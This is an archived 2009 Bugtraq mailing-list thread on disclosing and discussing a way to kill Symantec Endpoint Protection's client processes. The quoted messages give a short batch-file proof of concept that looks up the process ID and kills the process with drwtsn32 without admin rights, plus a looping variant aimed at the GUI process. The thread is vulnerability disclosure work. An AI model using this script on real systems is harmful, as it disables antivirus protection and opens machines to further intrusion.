lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <C8B6D9C849DD8F4E8FD7E906FD3A712E2BECA2E4D0@MAIL2.transitionalwork.local>
Date: Fri, 13 Feb 2009 14:32:24 -0500
From: David Calabro <dcalabro@...nsitionalwork.org>
To: "'Sandeep Cheema'" <51l3n7@...e.in>,
	"'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com>
Subject: RE: SEPKILL /im SMC.EXE /f

If the Symantec Management Client service was somehow changed from "smc.exe" to "smc.exe -P" it would effectively prevent the service from starting in the first place. Correct?

-----Original Message-----
From: Sandeep Cheema [mailto:51l3n7@...e.in] 
Sent: Friday, February 13, 2009 12:25 PM
To: bugtraq@...urityfocus.com
Subject: Re: SEPKILL /im SMC.EXE /f

Just as an update  couldn't get any further other than t.he fact that 
SMCGui.exe is getting killed as its running in the user account and SMC.exe 
in the system account.

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@...e.in>
Sent: Friday, February 13, 2009 8:06 PM
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

> For the "users" its working for SmcGUI.exe
>
> Please find the code as below.
>
> :here
> tasklist | find /i "SmcGui.exe" > c:\pid.txt
> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
> drwtsn32 -p %pidopt%
> goto :here
>
> I have tried it and when let this file run for around 2 mins, The 
> SmcGui.exe process loads up when you logoff and log back in (or 
> restart)but the icon does not show up in the taskbar.
>
> Thank you.
>
> Regards, Sandeep
>
> --------------------------------------------------
> From: "Sandeep Cheema" <51l3n7@...e.in>
> Sent: Friday, February 13, 2009 7:03 PM
> To: <bugtraq@...urityfocus.com>
> Subject: Re: SEPKILL /im SMC.EXE /f
>
>> As an update its not happening for "Users" account, Though no access 
>> denied.
>>
>> Anyone knows why?
>>
>> Thank you.
>>
>> Regards, Sandeep
>>
>> --------------------------------------------------
>> From: "Sandeep Cheema" <51l3n7@...e.in>
>> Sent: Friday, February 13, 2009 6:18 PM
>> To: <bugtraq@...urityfocus.com>
>> Subject: SEPKILL /im SMC.EXE /f
>>
>>> Hi,
>>>
>>> Probably this bug exists on majorly all the software's but security 
>>> software's like antivirus and firewall have to bucket it which is not 
>>> what its for SEP.
>>> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP 
>>> and 2k3)
>>>
>>>
>>> You can kill smc.exe with the help of drwtsn32.exe in the following way.
>>>
>>> drwtsn32 -p %pid%
>>> where pid is the process id for smc.exe
>>>
>>> POC:
>>>
>>> Save the following as a batch file and execute it
>>>
>>> tasklist | find /i "Smc.exe" > c:\pid.txt
>>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>>> drwtsn32 -p %pidopt%
>>>
>>>
>>>
>>> You don't need admin privilege for this exploit.
>>>
>>> This will even bypass the password if it has been set to stop the 
>>> service.
>>> If executed from the command line in the form drwtsn32 -p %pid% , the 
>>> command will be executed and it takes some time for the process to be 
>>> stopped.
>>> If done from a batch file the command is completed only when the process 
>>> is stopped.
>>>
>>> Regards, Sandeep
>>> 51l3n7[at]live.in
>>>
>>>
>>> 

Download attachment "winmail.dat" of type "application/ms-tnef" (4447 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ